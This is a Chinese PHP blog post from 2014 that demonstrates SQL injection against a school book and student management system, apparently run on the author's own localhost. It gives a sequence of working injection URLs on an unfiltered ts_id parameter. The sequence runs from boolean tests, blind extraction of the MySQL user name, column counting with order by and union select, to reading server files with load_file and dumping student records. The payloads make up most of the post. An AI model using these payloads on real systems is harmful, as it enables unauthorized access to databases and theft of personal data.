首页
技术博客
PHP教程
数据库技术
前端开发
HTML5
Nginx
php论坛
新用户注册
|
会员登录
PHP教程
技术博客
编程问答
PNG素材
编程语言
前端技术
Android
PHP教程
HTML5教程
数据库
Linux技术
Nginx技术
PHP安全
WebSerer
职场攻略
JavaScript
开放平台
业界资讯
大话程序猿
登录
极速注册
取消
热门标签 | HotTags
hashcode
iostream
process
timezone
merge
typescript
ip
version
integer
window
settings
hashtable
php8
express
bitmap
blob
email
split
get
range
replace
timestamp
triggers
eval
cPlusPlus
flutter
java
erlang
php5
cpython
go
actionscrip
heatmap
format
main
node.js
post
function
bit
loops
instance
import
rsa
lua
metadata
yaml
object
datetime
数组
shell
string
hash
emoji
python3
ascii
less
audio
plugins
install
command
dockerfile
python2
jsp
client
byte
filter
nodejs
list
keyword
sum
perl
hashset
random
text
md5
cSharp
grid
web
select
当前位置:
开发笔记
>
编程语言
> 正文
简单PHP注入演示
作者:perfect--林榆盛 | 来源:互联网 | 2014-07-17 01:12
学校的一个外聘老师写的程序,图书+学生管理系统,文件名001.php,002.php,003.php......(B名起的)问题出在004.php第多少行我也忘了,tdwidth118rowspan4aligncentervalignmiddleahref004.php?ts_id?phpecho$array[ts_i
学校的一个外聘老师写的程序,图书+学生管理系统,文件名001.php,002.php,003.php......(B名起的)问题出在004.php第多少行我也忘了,
书名:
注意这句
,ts_id没有任何过滤,赤裸裸的等我们虐待,HOO~(虽然我知道数据库的一切信息,但是这里我还是要黑箱测试)
LET'S GO~
http://localhost/zhd/004.php?ts_id=1 and 1=1 正常
http://localhost/zhd/004.php?ts_id=1 and 1=2 异常
白痴注入
判断数据库:
提交http://localhost/zhd/004.php?ts_id=1/*fenggou
正常返回,说明数据库支持/*注释,什么数据库支持/*呢?MYSQL!
读取用户名:
提交http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=114/*
正常返回,user()是MYSQL的内置函数,用来查看用户,这里是查看个用户名的第一个字符,没错114是ACCSLL中的"r",我是root连接,所以语句为真(这招贱心教我滴)但是如果用户名是rijnc的话我不是被骗了?所以在提交
http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=111/* o
http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=111/* o
http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=116/* t
但是如果密码是rootrijnc,那我无语…
判断字段数:
提交http://localhost/zhd/004.php?ts_id=1 order by 10/*
失败,说明字段数小于10,一直试到7语句成立,一共是7个字段了,对我们以后的联合查询带来极大方便,有个小技巧,先5,在10,在15,依次一点点缩小范围
联合查询:
知道了字段数直接提交http://localhost/zhd/004.php?ts_id=1 union select 1,2,3,4,5,6,7/*
正常返回,说明支持union,把语句改改,用and 1=2让他显示错误,嘿嘿~~~
提交http://localhost/zhd/004.php?ts_id=1 and 1=2 union select 1,2,3,4,5,6,7/*
成功了!
提交http://localhost/zhd/004.php?ts_id=1%20and%201=2%20union%20select%201,database(),3,4,5,6,7/*
在第二个字段书名也就是"2"的地方显示db1,没错,这个程序数据库名就是db1
我所知道有用的MYSQL函数sexxion_user()、current_user(),user(),system_user(),database(),version(),load_file()这个要root的,不过很好用,可以读任意文件并显示。
我是root连接,可以直接这样,但是值得注意的是magic_quotes_gpc = off的时候load_file('c:\boot.ini')才成立,on的时候用16进制来提交
http://localhost/zhd/004.php?ts_id=-1%20union%20select%201,2,3,4,load_file(0x633a2f626f6f742e696e69),6,7/
暴露了服务器的信息,还可以读别的,发挥自己的想象力吧,我要保护我的脑细胞...
获得表名:
http://localhost/zhd/004.php?ts_id=1%20and%201=2%20union%20select%201,2,3,4,5,6,7 from books/*
http://localhost/zhd/004.php?ts_id=1%20and%201=2%20union%20select%201,2,3,4,5,6,7 from student/*
正常返回,说明存在books和student这两个表(???木有admin啊!!!)MYSQL注入就是这样表名要猜,不想MSSQL能暴,麻痹的!还有还有,不要以为联合查询只能用自带函数,它是可以直接读出字段内容的,比如这个表:
http://localhost/zhd/004.php?ts_id=1%20and%201=2%20union%20select%201,2,3,4,5,6,7 from student/*
2 3 5 7的位置可以用来读,(为什么?地方大呗,要是char(2)你能显示什么??)
http://localhost/zhd/004.php?ts_id=1%20and%201=2%20union%20select%201,sno,sname,4,sex,6,7 from student/*
全看到了,虽然不是密码,呵呵,但原理是一样的(前提是要知道字段名称的,哎,麻烦,在BS下)
还可以这样
http://localhost/zhd/004.php?ts_id=1%20and%201=2%20union%20select%201,2,sname,4,sex,6,7 from student where sno=2/*
和MSSQL注入差不多的,OVER。
php
写下你的评论吧 !
吐个槽吧,看都看了
会员登录
|
用户注册
推荐阅读
php
Spark 贝叶斯分类算法
一、贝叶斯定理数学基础我们都知道条件概率的数学公式形式为即B发生的条件下A发生的概率等于A和B同时发生的概率除以B发生的概率。根据此公式变换,得到贝叶斯公式:即贝叶斯定律是关于随机 ...
[详细]
蜡笔小新 2024-09-28 21:04:11
java
mysql oneproxy稳定吗_Mysql 中间件 oneProxy总结
建议使用之前把官方的文档全部通读一遍这里提供一个我的网盘地址oneproxy百度网盘0.先对oneproxy有个大概的了解,知道他所处的位置1.MySQL服务器创建t ...
[详细]
蜡笔小新 2024-09-28 20:59:09
ip
MariaDB 10 Slave Crash-Safe需转为GTID复制模式
之前写了一篇《MySQL5.6crash-safereplication》,但在Mariadb10.0.X和10.1.X上不支持relay_log_info_repository ...
[详细]
蜡笔小新 2024-09-28 19:34:18
ip
高薪技术实战分享Nginx、Tomcat、Spring全家桶、微服务和Docker
前言微服务架构(MicroserviceArchitecture)是一种架构概念,旨在通过将功能分解到各个离散的服务中以实现对解决方案的解耦。你可以将其看作是在架构层次而非获取服务 ...
[详细]
蜡笔小新 2024-09-28 19:24:40
ip
变限积分求导公式总结_变限积分的求导公式及其应用
变限积分的求导公式及其应用周少波;雷冬霞;程生敏【期刊名称】《学园》【年(卷),期】2012(000)019【摘要】本文针对学生难以掌握的变限定积分的最为一般的求导公式 ...
[详细]
蜡笔小新 2024-09-28 19:17:07
java
C语言bool函数库,c语言bool函数例子
c语言自定义BOOL函数C语言没有BOOL类型变量boolean类型是C++所独有的由于使用BOOL类型可以使代码更具有可读性,很多编程者都在C中自己定义了类似的应用,一般方法有两 ...
[详细]
蜡笔小新 2024-09-28 18:53:24
java
ARToolKitunity
ARToolKit为开源的AR库,相对于高通和easyAr有几点特点:1)开源2)识别项目可以动态添加(详细在后)3)识别文件可以本地生成4)目前只能识别图片(目前为.jpg格式) ...
[详细]
蜡笔小新 2024-09-28 18:44:56
java
Java工作流引擎关于数据加密流程(MD5数据加密防篡改)
关键字:驰骋工作流程快速开发平台工作流程管理系统工作流引擎asp.net工作流引擎java工作流引擎.开发者表单拖拽式表单工作流系统流程数据加密md5数据保密流程数据防篡改软加密适 ...
[详细]
蜡笔小新 2024-09-28 18:39:01
java
2021年陕西450分理科能上什么大学?陕西450分的二本学校名单
1、河北科技大学二、陕西450分的二本学校名单陕西文科 ...
[详细]
蜡笔小新 2024-09-28 18:38:49
settings
【实践】基于RTThread的智慧路灯案例实验分享
之前分享了基于LiteOS的智慧农业案例实验分享基于LiteOS的智慧农业案例实验分享,阅读量挺不错,看样子大家都挺喜欢这种实验。那咱们就再来一个类似的实验:基于RT-Thread ...
[详细]
蜡笔小新 2024-09-28 18:25:24
settings
懒,天然的惰性
婴儿吃完奶就会睡去,这是懒惰的表现。稍长大一点,走路、干活的时间长一点,就要父母抱。他走路、做事是好奇,或者是为了得到父母的表扬和赞美。如果没有父母的鼓励和教育,他可能终生都不会站起来 ...
[详细]
蜡笔小新 2024-09-28 18:20:37
get
Linux系统管理之rpm软件包管理
系统管理部分软件包管理进程管理服务管理磁盘管理系统管理之软件包管理软件包的安装方式yumapt方式rpmdpkg方式编译安装方式二进制安装方式rpm安装方式增删改查安装:-ivh查 ...
[详细]
蜡笔小新 2024-09-28 18:08:26
express
ASP.NET Core WebAPI 开发新建WebAPI项目 转
转 http:www.cnblogs.comlinezerop5497472.htmlASP.NETCoreWebAPI开发-新建WebAPI项目ASP.NETCoreWebAPI ...
[详细]
蜡笔小新 2024-09-28 17:57:27
ip
EasyGBS无法播放WebRTC格式的视频流,是什么原因?
国标GB28181协议视频监控智能分析平台EasyGBS近期更新了新内核版本,性能也更加稳定。EasyGBS支持无缝、完整接入内网或者公网的国标设备,提供RTSP、RTMP、FLV ...
[详细]
蜡笔小新 2024-09-28 17:40:01
ip
好看的综艺节目具备什么特点?:节目情节设置
感谢悟空邀请节目情节设置!最重要的特点就是要与观众产生共鸣节目情节设置! ...
[详细]
蜡笔小新 2024-09-28 17:36:45
perfect--林榆盛
这个家伙很懒,什么也没留下!
Tags | 热门标签
hashcode
iostream
process
timezone
merge
typescript
ip
version
integer
window
settings
hashtable
php8
express
bitmap
blob
email
split
get
range
replace
timestamp
triggers
eval
cPlusPlus
flutter
java
erlang
php5
cpython
RankList | 热门文章
1
甲骨文被曝服务器漏洞,攻击者窃获 22.6 万美元加密货币
2
C#学习教程:如何在winforms桌面应用程序中创建自动完成文本框分享
3
27.3. Directory and File System Related
4
如何理解projection window
5
java开发关于ORA00604和ORA12705
6
织梦DedeCMS修改文档的默认命名规则
7
增强现实创企Magic Leap获日本最大移动运营商2.8亿美元投资
8
如何获得固定位置的div,以使其与内容水平滚动?使用jQuery
9
活在当下,用心现在做的!
10
深入剖析OkHttp系列(五) 来自官方的事件机制
11
http协议_http协议的缓存
12
Java使用代理Proxy访问网络
13
我是如何 2 个月拿到 4 份 Offer 并收入翻倍的?
14
微软索尼合作开发流媒体业务 外媒:谷歌施压 身不由己
15
Servlet 架构
PHP1.CN | 中国最专业的PHP中文社区 |
DevBox开发工具箱
|
json解析格式化
|
PHP资讯
|
PHP教程
|
数据库技术
|
服务器技术
|
前端开发技术
|
PHP框架
|
开发工具
|
在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved |
京公网安备 11010802041100号
|
京ICP备19059560号-4
| PHP1.CN 第一PHP社区 版权所有